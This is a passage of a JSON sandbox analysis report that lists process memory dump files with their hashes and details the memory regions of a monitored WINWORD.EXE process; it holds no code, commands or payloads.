"process_dumps/process_00000007-region_00001216-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000007-region_00001216-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_328", "md5_hash": "bca01433205eaddc6d94862806b57dc5", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "16563bf8094963e51e33c8303aaa758d1512f033", "sha256_hash": "e17344ded0d973345bcfb511d16518a9ea63b90016efc8b71f771d2249667e3b", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001220-addr_0x00000000000b0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000007-region_00001220-addr_0x00000000000b0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_329", "md5_hash": "dc8982cfb2d7d1ed2f1ddd8e3cc7d5be", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "622ec604175397f0d33207e3324e5d4c656d140f", "sha256_hash": "4900d38a5e2b7e069f5cfe1cb11781e8348a95b1217af9d053919524928eb1bb", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001221-addr_0x00000000002b0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000007-region_00001221-addr_0x00000000002b0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_330", "md5_hash": "09e2ec2e8fd709765841c3022495d0df", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1269eb15246c8446cf82352f82526908c33842ed", "sha256_hash": "ed58b319bef786b4e16a1c7646033767b5a16e8f9b2eebe1776c3e9253278489", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001222-addr_0x0000000001120000-size_0x000000000006a000-perm_rwx.bin", "filename": "process_00000007-region_00001222-addr_0x0000000001120000-size_0x000000000006a000-perm_rwx.bin", "id": "proc_dump_331", "md5_hash": "68ff15cac13515d7a1cae8c7803dccf7", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "cb153b719dbb6fbd7f7ca01b4701d4118d7b9d79", "sha256_hash": "ef6fc0226b9123b7a6bfc84aef43b7a70d6b8d74edf6ab2dedf01f6f75213ef8", "size": 434176, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001226-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000007-region_00001226-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_332", "md5_hash": "865c003b52d2eca3271fb53a432c03a4", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "85867177bc9fb4c56627ddad6a7fe957126d1533", "sha256_hash": "76fc6987fdae15f2b681c01ef99736b39be0cf239efe6a1752cdcfb4b7ac6ef4", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001227-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000007-region_00001227-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_333", "md5_hash": "0033b6a89c8eb49f66eb1553914783b5", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "12588e2ef9b5e0a4e7df328702fc56065bc090e4", "sha256_hash": "c9f25cf3878420598007ab307afba1aecaa68eaa2e7536bba5bf74e46286cc0f", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001228-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000007-region_00001228-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_334", "md5_hash": "0033b6a89c8eb49f66eb1553914783b5", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "12588e2ef9b5e0a4e7df328702fc56065bc090e4", "sha256_hash": "c9f25cf3878420598007ab307afba1aecaa68eaa2e7536bba5bf74e46286cc0f", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001230-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "filename": "process_00000007-region_00001230-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "id": "proc_dump_335", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001232-addr_0x00000000000f0000-size_0x0000000000080000-perm_rw.bin", "filename": "process_00000007-region_00001232-addr_0x00000000000f0000-size_0x0000000000080000-perm_rw.bin", "id": "proc_dump_336", "md5_hash": "86358825013934d9dfa1976d342f7491", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "504175e736ccc203683d128322f43f5a83e578b8", "sha256_hash": "9f7fac118cfd4aee55a69cd916ddb47232ec7dad9cad35d622c7fd96ae573c62", "size": 524288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001236-addr_0x00000000774a0000-size_0x00000000000fa000-perm_rwx.bin", "filename": "process_00000007-region_00001236-addr_0x00000000774a0000-size_0x00000000000fa000-perm_rwx.bin", "id": "proc_dump_337", "md5_hash": "6eeea0bcbc21bd1c0d7f0d6ae3488f7b", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fad191d56abe255a03a7b4b3b641fcfa8a4f81fe", "sha256_hash": "938a68694e4495227ebc925be61a20adb5c6c82d7dd57cc67a2717e2f9f2bf70", "size": 1024000, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001237-addr_0x00000000775a0000-size_0x000000000011f000-perm_rwx.bin", "filename": "process_00000007-region_00001237-addr_0x00000000775a0000-size_0x000000000011f000-perm_rwx.bin", "id": "proc_dump_338", "md5_hash": "caf76e9dd8864dfb7d729847f3595e80", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "71745f0f20bf18b3813fbb1a30eed8d41dc1d51d", "sha256_hash": "f113bc4b90aa0447b7992c2783d7c3b16d63f0e65e2c54c6e93ba833e8e0c667", "size": 1175552, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001239-addr_0x0000000000170000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000007-region_00001239-addr_0x0000000000170000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_339", "md5_hash": "f6dcdfde806b8805c1120f0f6a89bb9d", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "af76f0999e43dc51519e7df0c92a9dca097e9f26", "sha256_hash": "5e2cd4cfe6e1489e84016aa01f7f78aff156092ccc07d2f9dfe8f915ca2629e5", "size": 593920, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001298-addr_0x0000000000f30000-size_0x0000000000170000-perm_rw.bin", "filename": "process_00000007-region_00001298-addr_0x0000000000f30000-size_0x0000000000170000-perm_rw.bin", "id": "proc_dump_340", "md5_hash": "34b82f10a373e7e20e5b78e91781f902", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "6753cad0918823da14329a71da524c2acd7f0f7d", "sha256_hash": "135481b131a8f8a99f33935b004f44e9266c531869c9ff0b6cac29c440aef60c", "size": 1507328, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001317-addr_0x0000000004b40000-size_0x0000000000140000-perm_rw.bin", "filename": "process_00000007-region_00001317-addr_0x0000000004b40000-size_0x0000000000140000-perm_rw.bin", "id": "proc_dump_341", "md5_hash": "aa9a79f5d493768139d70f134065c2ab", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "57e171aa5a33024f9adee2007d75eb7811f78c1e", "sha256_hash": "94f949772fb65b5a89d807945c27985771aab4eee1c4a8e3c0652992c0e02130", "size": 1310720, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001325-addr_0x0000000004c80000-size_0x0000000000140000-perm_rw.bin", "filename": "process_00000007-region_00001325-addr_0x0000000004c80000-size_0x0000000000140000-perm_rw.bin", "id": "proc_dump_342", "md5_hash": "aa9a79f5d493768139d70f134065c2ab", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "57e171aa5a33024f9adee2007d75eb7811f78c1e", "sha256_hash": "94f949772fb65b5a89d807945c27985771aab4eee1c4a8e3c0652992c0e02130", "size": 1310720, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001326-addr_0x0000000000500000-size_0x000000000001b000-perm_rw.bin", "filename": "process_00000007-region_00001326-addr_0x0000000000500000-size_0x000000000001b000-perm_rw.bin", "id": "proc_dump_343", "md5_hash": "74c460eed5f8d8c48a77082700dd00ad", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5fb4c11293ec7ada7906a76ad395df77bebb8198", "sha256_hash": "1bffd3f267597b9538949679515edec6a0ff34a3df283f01216927b79777d042", "size": 110592, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001346-addr_0x0000000004c80000-size_0x0000000000130000-perm_rw.bin", "filename": "process_00000007-region_00001346-addr_0x0000000004c80000-size_0x0000000000130000-perm_rw.bin", "id": "proc_dump_344", "md5_hash": "22037f746959d319e9af2a33992dd345", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ac4fa10f067ff4c86460f04359ede7862d388c3c", "sha256_hash": "e2842d677a72cbda96c2e3a4d5916da33fe31c5a594466a5890127a0172f9025", "size": 1245184, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001358-addr_0x0000000000660000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000007-region_00001358-addr_0x0000000000660000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_345", "md5_hash": "69b7cb6f63aff16c26f3c242c8398079", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "856c41f8061b02d2b6b0fc27485afdfd57fce5aa", "sha256_hash": "35d1a20e8d72fec2edec12721f26e9eb493f167789c0b046e6463873c3d468c8", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001360-addr_0x0000000004dc0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000007-region_00001360-addr_0x0000000004dc0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_346", "md5_hash": "d4b6ae54d3967bfb5d6e0596fafdc158", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "6369dea2257890642e31310c8b3f339f2f3e173a", "sha256_hash": "6ad587fbd9b80c96b79703abfc5842e212a9f1099fb76c5e44dbc246f3073ee7", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001362-addr_0x000000007efa4000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000007-region_00001362-addr_0x000000007efa4000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_347", "md5_hash": "88b62a2496c6a5a9390fa520cb1071fe", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "01d4bce6646197d1235f974e5f055cdfc91e2c08", "sha256_hash": "3d88da7a06bb7b94742724f9ed26c9f37053b5af0ddd9c9959f45ac0957c5e63", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001469-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000008-region_00001469-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_353", "md5_hash": "be9a20dd43fd2c2f781c4d523c843e96", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "782b3330dd9f6608704b33efb4eb4e5fe7a437be", "sha256_hash": "63e16891e7c177502aecd0c84b947b43067aa28c8f667053ee78f48504584e85", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001470-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000008-region_00001470-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_354", "md5_hash": "ce464957d65f8564f7fd5a28f9360895", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d2665d40eda242c45f64459250d99d68f0596487", "sha256_hash": "54fec838b6fae63a5cafa6890db9200723d37550fc0541325fcfed804007d23b", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001474-addr_0x00000000000f0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000008-region_00001474-addr_0x00000000000f0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_355", "md5_hash": "dc8982cfb2d7d1ed2f1ddd8e3cc7d5be", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "622ec604175397f0d33207e3324e5d4c656d140f", "sha256_hash": "4900d38a5e2b7e069f5cfe1cb11781e8348a95b1217af9d053919524928eb1bb", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001475-addr_0x0000000000230000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000008-region_00001475-addr_0x0000000000230000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_356", "md5_hash": "135f7f7045df4d74fabd26d021f70f8c", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "030c66cd89f1e3ffdcd7e12e2736a66da1fc603c", "sha256_hash": "c82dafe4f5fe2e40007d684f5732e816cfc5c7ae163961123df2894814821a53", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001480-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000008-region_00001480-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_357", "md5_hash": "865c003b52d2eca3271fb53a432c03a4", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "85867177bc9fb4c56627ddad6a7fe957126d1533", "sha256_hash": "76fc6987fdae15f2b681c01ef99736b39be0cf239efe6a1752cdcfb4b7ac6ef4", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001481-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000008-region_00001481-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_358", "md5_hash": "0033b6a89c8eb49f66eb1553914783b5", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "12588e2ef9b5e0a4e7df328702fc56065bc090e4", "sha256_hash": "c9f25cf3878420598007ab307afba1aecaa68eaa2e7536bba5bf74e46286cc0f", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001482-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000008-region_00001482-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_359", "md5_hash": "0033b6a89c8eb49f66eb1553914783b5", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "12588e2ef9b5e0a4e7df328702fc56065bc090e4", "sha256_hash": "c9f25cf3878420598007ab307afba1aecaa68eaa2e7536bba5bf74e46286cc0f", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001484-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "filename": "process_00000008-region_00001484-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "id": "proc_dump_360", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001486-addr_0x0000000000480000-size_0x0000000000080000-perm_rw.bin", "filename": "process_00000008-region_00001486-addr_0x0000000000480000-size_0x0000000000080000-perm_rw.bin", "id": "proc_dump_361", "md5_hash": "86358825013934d9dfa1976d342f7491", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "504175e736ccc203683d128322f43f5a83e578b8", "sha256_hash": "9f7fac118cfd4aee55a69cd916ddb47232ec7dad9cad35d622c7fd96ae573c62", "size": 524288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001490-addr_0x00000000774a0000-size_0x00000000000fa000-perm_rwx.bin", "filename": "process_00000008-region_00001490-addr_0x00000000774a0000-size_0x00000000000fa000-perm_rwx.bin", "id": "proc_dump_362", "md5_hash": "6eeea0bcbc21bd1c0d7f0d6ae3488f7b", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fad191d56abe255a03a7b4b3b641fcfa8a4f81fe", "sha256_hash": "938a68694e4495227ebc925be61a20adb5c6c82d7dd57cc67a2717e2f9f2bf70", "size": 1024000, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001491-addr_0x00000000775a0000-size_0x000000000011f000-perm_rwx.bin", "filename": "process_00000008-region_00001491-addr_0x00000000775a0000-size_0x000000000011f000-perm_rwx.bin", "id": "proc_dump_363", "md5_hash": "caf76e9dd8864dfb7d729847f3595e80", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "71745f0f20bf18b3813fbb1a30eed8d41dc1d51d", "sha256_hash": "f113bc4b90aa0447b7992c2783d7c3b16d63f0e65e2c54c6e93ba833e8e0c667", "size": 1175552, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001510-addr_0x0000000000470000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000008-region_00001510-addr_0x0000000000470000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_364", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001511-addr_0x0000000000650000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000008-region_00001511-addr_0x0000000000650000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_365", "md5_hash": "135f7f7045df4d74fabd26d021f70f8c", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "030c66cd89f1e3ffdcd7e12e2736a66da1fc603c", "sha256_hash": "c82dafe4f5fe2e40007d684f5732e816cfc5c7ae163961123df2894814821a53", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001532-addr_0x0000000000130000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000008-region_00001532-addr_0x0000000000130000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_366", "md5_hash": "0033b6a89c8eb49f66eb1553914783b5", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "12588e2ef9b5e0a4e7df328702fc56065bc090e4", "sha256_hash": "c9f25cf3878420598007ab307afba1aecaa68eaa2e7536bba5bf74e46286cc0f", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001533-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000008-region_00001533-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_367", "md5_hash": "0033b6a89c8eb49f66eb1553914783b5", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "12588e2ef9b5e0a4e7df328702fc56065bc090e4", "sha256_hash": "c9f25cf3878420598007ab307afba1aecaa68eaa2e7536bba5bf74e46286cc0f", "size": 4096, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files (x86)\\Microsoft Office\\Office12\\WINWORD.EXE\"", "filename": "c:\\program files (x86)\\microsoft office\\office12\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_133", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:22.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 143359, "entry_point": 0, "filename": null, "id": "region_134", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:22.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 208895, "entry_point": 0, "filename": null, "id": "region_135", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:22.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_136", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:22.747", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_137", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_138", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_139", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_140", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_141", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_142", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 176128, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1290239, "entry_point": 0, "filename": null, "id": "region_143", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1323007, "entry_point": 0, "filename": null, "id": "region_144", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1392639, "entry_point": 0, "filename": null, "id": "region_145", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_146", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_147", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 98304, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1867775, "entry_point": 0, "filename": null, "id": "region_148", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_149", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, 